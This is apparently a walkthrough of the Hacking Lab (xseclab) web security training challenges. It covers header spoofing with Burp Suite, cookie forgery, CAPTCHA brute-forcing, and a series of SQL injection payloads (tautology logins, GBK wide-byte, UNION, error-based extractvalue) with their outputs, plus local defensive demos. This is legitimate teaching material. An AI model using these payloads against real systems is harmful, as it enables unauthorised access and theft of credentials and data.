Basic Level
Where is the key?
View the page source.
Encrypt it once more and you get the key~
xrlvf23xfqwsxsqf
ROT13 decode (ROT13 is its own inverse, so "encrypting once more" is the same as decoding):
keyis23ksdjfkfds
Guess how many times this was encrypted?
Keep base64-decoding; after a number of rounds you get the key.
key is jkljdkl232jkljkdl2389
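The two decoding challenges above are the same job done by hand: strip one known transform at a time until the result reads as text. As an added example (not part of the original write-up), here is a peeler that removes base64 layers until the content is no longer valid base64 and reports how many layers it removed, next to the ROT13 step; the stop rule (decoded bytes must be printable UTF-8) and the sample string are my own choices.

```python
import base64
import binascii
import codecs


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so decoding is the same call as encoding."""
    return codecs.decode(text, "rot_13")


def looks_like_text(data: bytes) -> bool:
    """Stop condition: bytes that are not printable UTF-8 are not another base64 layer."""
    try:
        return data.decode("utf-8").isprintable()
    except UnicodeDecodeError:
        return False


def peel_base64(blob: str, max_layers: int = 64):
    """Strip base64 layers until the content no longer decodes as base64 text.

    Returns (innermost text, number of layers removed). validate=True makes
    b64decode reject anything outside the base64 alphabet (spaces, punctuation),
    which is how a final key like "key is ..." stops the loop.
    """
    current = blob.strip()
    for layer in range(max_layers):
        try:
            decoded = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            return current, layer
        if not decoded or not looks_like_text(decoded):
            return current, layer
        current = decoded.decode("utf-8")
    return current, max_layers


def wrap_base64(text: str, layers: int) -> str:
    """Constructed sample generator: base64-encode `text` `layers` times."""
    current = text.encode()
    for _ in range(layers):
        current = base64.b64encode(current)
    return current.decode()


if __name__ == "__main__":
    print(rot13("xrlvf23xfqwsxsqf"))
    sample = wrap_base64("key is test123", 5)   # constructed, not the challenge's blob
    print(peel_base64(sample))
```

The layer count is worth keeping: when a challenge asks "how many times", the count is the answer, and a wrong stop rule (e.g. stopping at the first non-ASCII byte) silently under-counts.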
They say MD5 encryption is very secure. Is it really? (MD5 is a hash, not encryption; an unsalted MD5 of a common password is recovered from a lookup table.)
Racial discrimination
Intercept with Burp Suite, modify the request, and set Accept-Language to the following:
Accept-Language:en-US;q=0.3,en;q=0.2
key is: *(TU687jksf6&*
HAHA browser
Intercept with Burp Suite, modify the request, and append HAHA to the User-Agent field:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 HAHA
key is: meiyouHAHAliulanqi
Where on earth is the key?
F12, Network tab: the key is in the response headers.
key:kjh%#$#%FDjjj
The key is missing again
Visiting in the browser triggers a redirect; intercept with Burp Suite and modify the request headers. The key sits in the 302 response itself, which the browser follows without showing you.
key: ohHTTP302dd
Impersonate a logged-in user
Intercept with Burp Suite, modify the request headers, and add Cookie: Login=1
key is: yescookieedit7823789KJ
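The five challenges above are one move repeated: set a request header the server trusts, or read a response the browser hides. As an added example (not from the original write-up), here is a local stand-in for those checks and a client that solves them without Burp; the server, its paths, the check logic and the keys are all constructed for the demo and are not the lab's. The client uses http.client directly so that a 302 is returned to the caller instead of being followed.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class LabHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the header challenges; keys are made up."""

    def log_message(self, *args):
        pass  # keep request logging quiet

    def do_GET(self):
        h = self.headers
        if self.path == "/lang":                      # Accept-Language check
            ok = h.get("Accept-Language", "").startswith("en-US")
            self._reply(200, "key is: LANGKEY" if ok else "only en-US welcome")
        elif self.path == "/ua":                      # User-Agent must contain HAHA
            ok = "HAHA" in h.get("User-Agent", "")
            self._reply(200, "key is: UAKEY" if ok else "use the HAHA browser")
        elif self.path == "/hidden":                  # key only in a response header
            self._reply(200, "nothing to see", {"X-Key": "HEADERKEY"})
        elif self.path == "/redirect":                # key in the body of a 302
            self._reply(302, "key is: REDIRKEY", {"Location": "/gone"})
        elif self.path == "/cookie":                  # trusts a client-set cookie
            ok = "Login=1" in h.get("Cookie", "")
            self._reply(200, "key is: COOKIEKEY" if ok else "please log in")
        else:
            self._reply(404, "not found")

    def _reply(self, status, body, extra=None):
        data = body.encode()
        self.send_response(status)
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def start_lab():
    """Bind an ephemeral port on localhost and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), LabHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(port, path, headers=None):
    """Raw GET that never follows redirects, so a 302 body stays visible."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path, headers=headers or {})
    resp = conn.getresponse()
    result = (resp.status, dict(resp.getheaders()), resp.read().decode())
    conn.close()
    return result


def solve_all(port):
    """Apply each header trick from the write-up and collect what comes back."""
    keys = {}
    keys["lang"] = fetch(port, "/lang", {"Accept-Language": "en-US;q=0.3,en;q=0.2"})[2]
    keys["ua"] = fetch(port, "/ua", {"User-Agent": "Mozilla/5.0 HAHA"})[2]
    keys["hidden"] = fetch(port, "/hidden")[1].get("X-Key")
    status, _, body = fetch(port, "/redirect")
    keys["redirect"] = (status, body)
    keys["cookie"] = fetch(port, "/cookie", {"Cookie": "Login=1"})[2]
    return keys


if __name__ == "__main__":
    lab = start_lab()
    try:
        for name, value in solve_all(lab.server_address[1]).items():
            print(name, value)
    finally:
        lab.shutdown()
```

The defensive reading is the same for every endpoint: Accept-Language, User-Agent and an unsigned cookie are client-controlled, so a server must not derive authorization from them; a 302 must not carry the secret it is redirecting away from.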
Compare number sizes
F12, edit the element: change maxlength="3" to 4 and enter a 4-digit number to get the key (the limit is only enforced client-side).
key is 768HKyu678567&*&K
The lure of localhost
View the source to get the key.
Just won't let you access it
Check robots.txt.
Visit the Disallow entry: /9fb97531fe95594603aff7e794ab2f5f/
http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/
you find me,but I am not the login page. keep search.
Visit login.php
right! key is UIJ%%IOOqweqwsdf
Scripting Level
The key is missing yet again
Intercept and modify with Burp Suite.
key is : yougotit_script_now
Quick mental arithmetic
import re
import requests
url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
# PHPSESSID is per-session: replace this value with the one from your own intercepted request.
header = {'Cookie': 'PHPSESSID=$db3879ed8a244c77c04f65082042850c'}
# Fetch the challenge page and pull out the arithmetic expression that precedes the answer box.
resp_content = requests.get(url, headers=header).content.decode('utf-8')
matches = re.search("(.*)=<input", resp_content)
expression = matches.group(1).strip()
# The expression is server-supplied text, so evaluate it with builtins disabled;
# the script answers within the time limit that a human cannot meet.
data = {'v': str(eval(expression, {'__builtins__': {}}, {}))}
# Post the answer with the same session cookie, then print the body (key or failure message).
resp_content = requests.post(url, headers=header, data=data).content.decode('utf-8')
matches = re.search("<body>(.*)</body>", resp_content)
print(matches.group(1))
The PHPSESSID value differs per session; capture a request to see yours, and use the same cookie for the GET and the POST as the script does.
This challenge is empty
Empty
null; submit null.
Why won't the key pop up?
https://blog.csdn.net/a954680384/article/details/51456430
https://blog.csdn.net/qq_40980391/article/details/81161836
Silly CAPTCHA, part 1
Brute-force with Burp Suite.
Silly CAPTCHA, part 2
https://blog.csdn.net/Selukwe/article/details/72802735
Silly CAPTCHA, part 3 (SESSION)
Same as part 2: brute-force with Burp Suite.
https://blog.csdn.net/qq_40980391/article/details/81161904
key is LJLJLfuckvcodesdf#@sd
Just smile and you pass
https://blog.csdn.net/qq_26090065/article/details/82503651
Silly SMS verification code
Request the verification code for 13388886666.
Log in as 13388886667 with that code (the code is not bound to the number it was sent to).
key is LJLJLGod!@@sd
Years of burning bromance
Burp brute force.
CAPTCHA recognition
XSS Basics Level
Disable JavaScript in the browser and view the source.
Hint:
alert("Please use alert(HackingLab)!!");
Submit it.
key is: myxssteststart!
XSS Basics 2: simple bypass
It gets filtered.
key is: xss2test2you
XSS Basics 3: detection and construction
Principle-is-important XSS
https://www.meetsec.cn/index.php/archives/8/
Injection Level
The simplest SQL injection
Tips:
Submit one of the following in the username field:
admin' or 'a'='a
admin' or 1=1#
admin' or 'a'='a'#
Password: anything. (# starts a MySQL comment, so the rest of the query, including the password check, is dropped.)
Login successful! My motto (flag) is iamflagsafsfskdf11223
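Why the first payload logs in, as an added example that is not part of the write-up: a constructed SQLite in-memory login table with the string-spliced query next to the parameterised one. SQLite has no # comment (it uses --), so the two #-terminated payloads raise an error here while they would work against the lab's MySQL; the table, credentials and motto are made up.

```python
import sqlite3

# The three payloads from the write-up.
PAYLOADS = ["admin' or 'a'='a", "admin' or 1=1#", "admin' or 'a'='a'#"]


def make_db():
    """Constructed in-memory stand-in for the challenge's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, motto TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!', 'demo-motto-flag')")
    return db


def login_vulnerable(db, username, password):
    """Query built by string splicing, which is what the challenge evidently does.

    With username = admin' or 'a'='a the WHERE clause becomes
    username='admin' or 'a'='a' AND password='...'; AND binds tighter than OR,
    so username='admin' alone is enough to return the row.
    """
    sql = ("SELECT motto FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Parameterised query: the quote in the payload is data, never syntax."""
    row = db.execute("SELECT motto FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None


def try_payloads(db, login):
    """Run each payload with an arbitrary password and record what happens."""
    results = {}
    for payload in PAYLOADS:
        try:
            results[payload] = login(db, payload, "anything")
        except sqlite3.Error as exc:
            results[payload] = "error: %s" % exc
    return results


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", try_payloads(db, login_vulnerable))
    print("fixed:     ", try_payloads(db, login_fixed))
```

The fixed version returns None for every payload because the whole string is compared against the username column; there is no query text for the quote to terminate.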
The simplest SQL injection (getting familiar with the injection environment)
View the source for the tip: id=1
?id=1 shows nothing
?id=1 or 1=1 shows output
Flag: HKGGflagdfs56757fsdv
Anti-injection
Wide-byte injection: ?id=1%df' (the filter escapes the quote to \', but under GBK the bytes %df%5c form one character, so the quote is live again)
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' order by 4%23
Errors, so there are only 3 columns.
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' union select 1,2,3 %23
Shows output.
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 %23
Query the table names; table name: sae_user_sqli4 (passed below as the hex literal 0x7361655f757365725f73716c6934 so no quotes are needed inside the escaped context).
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655f757365725f73716c6934),3 %23
Column names: id,title_1,content_1
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' union select 1,(select group_concat(id,title_1,content_1) from sae_user_sqli4),3 %23
1blog systemmy blog test,2so easyeasy ,229212flagishere#Hsaagdfs56sdf7fsdv,3where is flagflag is here!
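What makes %df' survive the filter, as an added example that is not from the original write-up: a byte-level escaper in the style of PHP's addslashes(), a counter for the quotes MySQL would actually see once the query bytes are read as GBK versus a single-byte charset, and a fixed builder that validates the input as GBK text before escaping. The escaper, the query template and the check are constructed for the demo; the table name is the one found above. The real-world fix is prepared statements, or at least a charset-aware escaper (mysql_set_charset() before mysql_real_escape_string() in PHP).

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-level escaping like PHP addslashes(): it knows nothing about charsets."""
    out = bytearray()
    for b in raw:
        if b == 0x00:
            out += b"\\0"
            continue
        if b in (0x27, 0x22, 0x5C):   # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(user_id: bytes) -> bytes:
    """Vulnerable builder: escape the bytes, then splice them into the query."""
    return b"SELECT * FROM sae_user_sqli4 WHERE id='" + addslashes(user_id) + b"'"


def count_live_quotes(query: bytes, charset: str) -> int:
    """Count the quotes the SQL parser sees after decoding in the connection charset.

    A correctly escaped query has exactly two (the delimiters). Under GBK the
    pair 0xDF 0x5C is one character, so the backslash addslashes inserted is
    swallowed and the attacker's quote becomes the third, live, quote.
    """
    text = query.decode(charset)
    quotes, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2          # escaped character: skip it
            continue
        if text[i] == "'":
            quotes += 1
        i += 1
    return quotes


def build_query_fixed(user_id: bytes, charset: str = "gbk") -> bytes:
    """Validate the input as text in the connection charset, then escape characters.

    An orphan lead byte such as 0xDF followed by 0x27 is not valid GBK, so the
    strict decode rejects it before any backslash can be glued onto it.
    """
    try:
        text = user_id.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError("input is not valid %s text" % charset) from exc
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return ("SELECT * FROM sae_user_sqli4 WHERE id='%s'" % escaped).encode(charset)


def rejected_by_fixed(user_id: bytes, charset: str = "gbk") -> bool:
    try:
        build_query_fixed(user_id, charset)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    q = build_query(b"1\xdf'")                       # the ?id=1%df' payload
    print(q)
    print("live quotes under gbk:   ", count_live_quotes(q, "gbk"))
    print("live quotes under latin1:", count_live_quotes(q, "latin-1"))
    print("fixed builder rejects it:", rejected_by_fixed(b"1\xdf'"))
```

Run under a single-byte charset the same bytes are harmless, which is why this bug only shows up when the connection charset is a multibyte one whose trail-byte range includes 0x5C (GBK, Big5, SJIS).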
Can it echo output or not?
Inject after LIMIT with PROCEDURE ANALYSE(). PROCEDURE ANALYSE() is a MySQL built-in that examines the values of the selected columns and suggests optimal column types; its arguments are evaluated, so an extractvalue() placed there raises an XPath error that carries the subquery result (error-based injection in a position where UNION cannot be used). Caveat: PROCEDURE ANALYSE was deprecated in MySQL 5.7 and removed in 8.0, so this only works against older servers.
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23 &num=1%23
Two tables: article, user
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23 &num=1%23
Column names: id,username,password,lastloginI (cut off: the extractvalue() error message shows at most 32 characters, including the leading colon)
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username,password) from user))),1)%23 &num=1%23
useruser,adminadmin,flagmyflagi
Not fully displayed (same 32-character limit), so narrow the result with a WHERE clause (0x666c6167 = 'flag'):
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username,password) from user where username=0x666c6167))),1)%23 &num=1%23
flagmyflagishere
dog1.jpg is vulnerable to wide-byte injection; submitting dog1.jpg%df' demonstrates it in the response.
Inject in Burp Suite:
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' order by 5 %23 HTTP/1.1
//Errors, so there are 4 columns
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,3,4 %23 HTTP/1.1
//Returns 3: the output position is the 3rd column
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,database(),4 %23 HTTP/1.1
//Database: mydbs
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x6d79646273 %23 HTTP/1.1
//Tables: article,pic (0x6d79646273 = 'mydbs')
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x61727469636c65 %23 HTTP/1.1
//Columns in article: id,title,content,others (0x61727469636c65 = 'article')
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x706963 %23 HTTP/1.1
//Columns in pic: id,picname,data,text (0x706963 = 'pic')
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(picname),4 from pic %23 HTTP/1.1
//Read the picname column
//dog1.jpg,cat1.jpg,flagishere_askldjfklasjdfl.jpg
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg
Visit the image to get the flag: IamflagIloveyou!
ErrorBased
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin%27%20and%20(extractvalue(1,concat(0x7e,(select%20(SELECT%20distinct%20concat(0x3a,username,0x3a,motto,0x3a,0x3a)%20FROM%20motto%20limit%203,1)),0x7e)))%23
URL-decoded payload: admin' and (extractvalue(1,concat(0x7e,(select (SELECT distinct concat(0x3a,username,0x3a,motto,0x3a,0x3a) FROM motto limit 3,1)),0x7e)))# (step through the rows of motto by changing the limit offset).
Blind injection
https://blog.csdn.net/weixin_41924764/article/details/107095963
General SQL injection protection
https://www.cnblogs.com/Ragd0ll/p/8614916.html
Supposedly hashed passwords cannot produce injection
https://www.cnblogs.com/Ragd0ll/p/8614916.html
Upload Level
https://www.meetsec.cn/index.php/archives/9/
https://www.jianshu.com/p/b73c8910abd1
Comprehensive Level
https://www.meetsec.cn/index.php/archives/11/